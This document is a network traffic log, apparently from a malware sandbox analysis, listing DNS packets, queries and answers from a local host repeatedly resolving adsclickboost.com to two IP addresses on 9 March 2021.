Mar 9, 2021 09:20:44.903255939 CET	57128	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:44.949476004 CET	53	57128	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:45.626708031 CET	54791	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:45.683645010 CET	53	54791	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:47.902055025 CET	50463	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:47.958316088 CET	53	50463	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:49.336298943 CET	50394	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:49.390866041 CET	53	50394	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:53.673589945 CET	58530	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:53.719696999 CET	53	58530	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:54.471636057 CET	53813	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:54.528038979 CET	53	53813	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:55.469770908 CET	63732	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:55.527308941 CET	53	63732	8.8.8.8	192.168.2.5
Mar 9, 2021 09:20:58.743350983 CET	57344	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:20:58.799052954 CET	53	57344	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:00.637432098 CET	54450	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:00.688527107 CET	53	54450	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:02.671098948 CET	59261	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:02.725676060 CET	53	59261	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:04.006505013 CET	57151	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:04.061182022 CET	53	57151	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:04.686767101 CET	59413	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:04.746500015 CET	53	59413	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:08.764111042 CET	60516	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:08.821330070 CET	53	60516	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:10.139359951 CET	51649	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:10.196490049 CET	53	51649	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:12.700711966 CET	65086	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:12.762744904 CET	53	65086	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:13.821084023 CET	56432	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:13.877744913 CET	53	56432	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:13.995326996 CET	52929	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:14.052035093 CET	53	52929	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:16.551091909 CET	64317	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:16.600128889 CET	53	64317	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:17.433542967 CET	61004	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:17.483513117 CET	53	61004	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:19.087519884 CET	56895	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:19.135160923 CET	53	56895	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:20.522866011 CET	62372	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:20.587188005 CET	53	62372	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:21.979372978 CET	61515	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:22.036109924 CET	53	61515	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:24.651948929 CET	56675	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:24.709096909 CET	53	56675	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:27.676211119 CET	57172	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:27.730484962 CET	53	57172	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:28.952229023 CET	55267	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:29.003262997 CET	53	55267	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:31.663428068 CET	50969	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:31.717844009 CET	53	50969	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:36.215027094 CET	64362	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:36.271835089 CET	53	64362	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:37.426369905 CET	54766	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:37.472558022 CET	53	54766	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:37.901061058 CET	61446	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:37.947179079 CET	53	61446	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:39.341859102 CET	57515	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:39.390552998 CET	53	57515	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:41.021374941 CET	58199	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:41.070255041 CET	53	58199	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:42.835565090 CET	65221	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:42.910744905 CET	53	65221	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:45.776158094 CET	61573	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:45.832709074 CET	53	61573	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:45.905293941 CET	56562	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:45.959961891 CET	53	56562	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:46.116060972 CET	53591	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:46.161994934 CET	53	53591	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:48.488218069 CET	59688	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:48.533941984 CET	53	59688	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:49.398040056 CET	56032	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:49.446726084 CET	53	56032	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:53.715073109 CET	61150	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:53.760977983 CET	53	61150	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:53.993217945 CET	63458	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:54.050559044 CET	53	63458	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:54.881251097 CET	50422	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:54.930011034 CET	53	50422	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:57.252228975 CET	53247	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:57.260003090 CET	58544	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:21:57.298078060 CET	53	53247	8.8.8.8	192.168.2.5
Mar 9, 2021 09:21:57.305679083 CET	53	58544	8.8.8.8	192.168.2.5
Mar 9, 2021 09:22:01.661578894 CET	53814	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:22:01.707762957 CET	53	53814	8.8.8.8	192.168.2.5
Mar 9, 2021 09:22:03.074649096 CET	51305	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:22:03.133946896 CET	53	51305	8.8.8.8	192.168.2.5
Mar 9, 2021 09:22:04.557732105 CET	53670	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:22:04.606555939 CET	53	53670	8.8.8.8	192.168.2.5
Mar 9, 2021 09:22:05.360167027 CET	55160	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:22:05.419420958 CET	53	55160	8.8.8.8	192.168.2.5
Mar 9, 2021 09:22:09.846214056 CET	61414	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:22:09.902715921 CET	53	61414	8.8.8.8	192.168.2.5
Mar 9, 2021 09:22:11.664372921 CET	63847	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:22:11.721760988 CET	53	63847	8.8.8.8	192.168.2.5
Mar 9, 2021 09:22:58.385030031 CET	61523	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:22:58.496015072 CET	53	61523	8.8.8.8	192.168.2.5
Mar 9, 2021 09:23:02.057784081 CET	50551	53	192.168.2.5	8.8.8.8
Mar 9, 2021 09:23:02.125286102 CET	53	50551	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 9, 2021 09:20:14.839911938 CET	192.168.2.5	8.8.8.8	0x8f4a	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:18.657510996 CET	192.168.2.5	8.8.8.8	0x543a	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:26.550331116 CET	192.168.2.5	8.8.8.8	0x1b78	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:32.256839991 CET	192.168.2.5	8.8.8.8	0xaab7	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:32.625494957 CET	192.168.2.5	8.8.8.8	0xcd01	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:37.434144020 CET	192.168.2.5	8.8.8.8	0xd39	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:39.006627083 CET	192.168.2.5	8.8.8.8	0xd2ff	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:40.607624054 CET	192.168.2.5	8.8.8.8	0x9110	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:45.626708031 CET	192.168.2.5	8.8.8.8	0xdb6	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:47.902055025 CET	192.168.2.5	8.8.8.8	0x49b8	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:49.336298943 CET	192.168.2.5	8.8.8.8	0x79f8	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:53.673589945 CET	192.168.2.5	8.8.8.8	0xa42a	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:54.471636057 CET	192.168.2.5	8.8.8.8	0xd48	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:55.469770908 CET	192.168.2.5	8.8.8.8	0x221f	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:00.637432098 CET	192.168.2.5	8.8.8.8	0x32e3	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:02.671098948 CET	192.168.2.5	8.8.8.8	0xd0fc	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:04.006505013 CET	192.168.2.5	8.8.8.8	0xe317	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:04.686767101 CET	192.168.2.5	8.8.8.8	0x57a1	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:08.764111042 CET	192.168.2.5	8.8.8.8	0x3cf	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:10.139359951 CET	192.168.2.5	8.8.8.8	0xa9cf	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:12.700711966 CET	192.168.2.5	8.8.8.8	0xee15	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:13.995326996 CET	192.168.2.5	8.8.8.8	0xe46f	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:17.433542967 CET	192.168.2.5	8.8.8.8	0x87a6	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:19.087519884 CET	192.168.2.5	8.8.8.8	0x973d	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:21.979372978 CET	192.168.2.5	8.8.8.8	0x1b57	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:24.651948929 CET	192.168.2.5	8.8.8.8	0x95eb	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:27.676211119 CET	192.168.2.5	8.8.8.8	0x9448	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:28.952229023 CET	192.168.2.5	8.8.8.8	0x575	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:31.663428068 CET	192.168.2.5	8.8.8.8	0xd703	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:36.215027094 CET	192.168.2.5	8.8.8.8	0x9c80	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:37.426369905 CET	192.168.2.5	8.8.8.8	0xeedf	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:37.901061058 CET	192.168.2.5	8.8.8.8	0x8e53	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:41.021374941 CET	192.168.2.5	8.8.8.8	0xa6e8	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:45.776158094 CET	192.168.2.5	8.8.8.8	0x6463	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:45.905293941 CET	192.168.2.5	8.8.8.8	0x368a	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:46.116060972 CET	192.168.2.5	8.8.8.8	0x3935	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:49.398040056 CET	192.168.2.5	8.8.8.8	0xc72f	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:53.715073109 CET	192.168.2.5	8.8.8.8	0x6cb7	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:53.993217945 CET	192.168.2.5	8.8.8.8	0x6d1e	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:54.881251097 CET	192.168.2.5	8.8.8.8	0xab1e	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:57.252228975 CET	192.168.2.5	8.8.8.8	0xd60f	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:01.661578894 CET	192.168.2.5	8.8.8.8	0x53ad	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:03.074649096 CET	192.168.2.5	8.8.8.8	0x80e9	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:04.557732105 CET	192.168.2.5	8.8.8.8	0xe9df	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:05.360167027 CET	192.168.2.5	8.8.8.8	0xb3bc	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:09.846214056 CET	192.168.2.5	8.8.8.8	0x941c	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)
Mar 9, 2021 09:22:11.664372921 CET	192.168.2.5	8.8.8.8	0xa261	Standard query (0)	adsclickboost.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Mar 9, 2021 09:20:14.903729916 CET	8.8.8.8	192.168.2.5	0x8f4a	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:14.903729916 CET	8.8.8.8	192.168.2.5	0x8f4a	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:18.716584921 CET	8.8.8.8	192.168.2.5	0x543a	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:18.716584921 CET	8.8.8.8	192.168.2.5	0x543a	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:26.607656956 CET	8.8.8.8	192.168.2.5	0x1b78	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:26.607656956 CET	8.8.8.8	192.168.2.5	0x1b78	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:32.311490059 CET	8.8.8.8	192.168.2.5	0xaab7	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:32.311490059 CET	8.8.8.8	192.168.2.5	0xaab7	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:32.672703981 CET	8.8.8.8	192.168.2.5	0xcd01	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:32.672703981 CET	8.8.8.8	192.168.2.5	0xcd01	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:37.480103970 CET	8.8.8.8	192.168.2.5	0xd39	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:37.480103970 CET	8.8.8.8	192.168.2.5	0xd39	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:39.064270973 CET	8.8.8.8	192.168.2.5	0xd2ff	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:39.064270973 CET	8.8.8.8	192.168.2.5	0xd2ff	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:40.662359953 CET	8.8.8.8	192.168.2.5	0x9110	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:40.662359953 CET	8.8.8.8	192.168.2.5	0x9110	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:45.683645010 CET	8.8.8.8	192.168.2.5	0xdb6	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:45.683645010 CET	8.8.8.8	192.168.2.5	0xdb6	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:47.958316088 CET	8.8.8.8	192.168.2.5	0x49b8	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:47.958316088 CET	8.8.8.8	192.168.2.5	0x49b8	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:49.390866041 CET	8.8.8.8	192.168.2.5	0x79f8	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:49.390866041 CET	8.8.8.8	192.168.2.5	0x79f8	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:53.719696999 CET	8.8.8.8	192.168.2.5	0xa42a	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:53.719696999 CET	8.8.8.8	192.168.2.5	0xa42a	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:54.528038979 CET	8.8.8.8	192.168.2.5	0xd48	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:54.528038979 CET	8.8.8.8	192.168.2.5	0xd48	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:55.527308941 CET	8.8.8.8	192.168.2.5	0x221f	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:20:55.527308941 CET	8.8.8.8	192.168.2.5	0x221f	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:00.688527107 CET	8.8.8.8	192.168.2.5	0x32e3	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:00.688527107 CET	8.8.8.8	192.168.2.5	0x32e3	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:02.725676060 CET	8.8.8.8	192.168.2.5	0xd0fc	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:02.725676060 CET	8.8.8.8	192.168.2.5	0xd0fc	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:04.061182022 CET	8.8.8.8	192.168.2.5	0xe317	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:04.061182022 CET	8.8.8.8	192.168.2.5	0xe317	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:04.746500015 CET	8.8.8.8	192.168.2.5	0x57a1	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:04.746500015 CET	8.8.8.8	192.168.2.5	0x57a1	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:08.821330070 CET	8.8.8.8	192.168.2.5	0x3cf	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:08.821330070 CET	8.8.8.8	192.168.2.5	0x3cf	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:10.196490049 CET	8.8.8.8	192.168.2.5	0xa9cf	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:10.196490049 CET	8.8.8.8	192.168.2.5	0xa9cf	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:12.762744904 CET	8.8.8.8	192.168.2.5	0xee15	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:12.762744904 CET	8.8.8.8	192.168.2.5	0xee15	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:14.052035093 CET	8.8.8.8	192.168.2.5	0xe46f	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:14.052035093 CET	8.8.8.8	192.168.2.5	0xe46f	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:17.483513117 CET	8.8.8.8	192.168.2.5	0x87a6	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:17.483513117 CET	8.8.8.8	192.168.2.5	0x87a6	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:19.135160923 CET	8.8.8.8	192.168.2.5	0x973d	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:19.135160923 CET	8.8.8.8	192.168.2.5	0x973d	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:22.036109924 CET	8.8.8.8	192.168.2.5	0x1b57	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:22.036109924 CET	8.8.8.8	192.168.2.5	0x1b57	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:24.709096909 CET	8.8.8.8	192.168.2.5	0x95eb	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:24.709096909 CET	8.8.8.8	192.168.2.5	0x95eb	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:27.730484962 CET	8.8.8.8	192.168.2.5	0x9448	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:27.730484962 CET	8.8.8.8	192.168.2.5	0x9448	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:29.003262997 CET	8.8.8.8	192.168.2.5	0x575	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:29.003262997 CET	8.8.8.8	192.168.2.5	0x575	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:31.717844009 CET	8.8.8.8	192.168.2.5	0xd703	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:31.717844009 CET	8.8.8.8	192.168.2.5	0xd703	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:36.271835089 CET	8.8.8.8	192.168.2.5	0x9c80	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:36.271835089 CET	8.8.8.8	192.168.2.5	0x9c80	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:37.472558022 CET	8.8.8.8	192.168.2.5	0xeedf	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:37.472558022 CET	8.8.8.8	192.168.2.5	0xeedf	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:37.947179079 CET	8.8.8.8	192.168.2.5	0x8e53	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:37.947179079 CET	8.8.8.8	192.168.2.5	0x8e53	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:41.070255041 CET	8.8.8.8	192.168.2.5	0xa6e8	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:41.070255041 CET	8.8.8.8	192.168.2.5	0xa6e8	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:45.832709074 CET	8.8.8.8	192.168.2.5	0x6463	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:45.832709074 CET	8.8.8.8	192.168.2.5	0x6463	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:45.959961891 CET	8.8.8.8	192.168.2.5	0x368a	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:45.959961891 CET	8.8.8.8	192.168.2.5	0x368a	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:46.161994934 CET	8.8.8.8	192.168.2.5	0x3935	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:46.161994934 CET	8.8.8.8	192.168.2.5	0x3935	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:49.446726084 CET	8.8.8.8	192.168.2.5	0xc72f	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:49.446726084 CET	8.8.8.8	192.168.2.5	0xc72f	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:53.760977983 CET	8.8.8.8	192.168.2.5	0x6cb7	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:53.760977983 CET	8.8.8.8	192.168.2.5	0x6cb7	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:54.050559044 CET	8.8.8.8	192.168.2.5	0x6d1e	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:54.050559044 CET	8.8.8.8	192.168.2.5	0x6d1e	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:54.930011034 CET	8.8.8.8	192.168.2.5	0xab1e	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:54.930011034 CET	8.8.8.8	192.168.2.5	0xab1e	No error (0)	adsclickboost.com	172.67.178.142	A (IP address)	IN (0x0001)
Mar 9, 2021 09:21:57.298078060 CET	8.8.8.8	192.168.2.5	0xd60f	No error (0)	adsclickboost.com	104.21.48.50	A (IP address)	IN (0x0001)
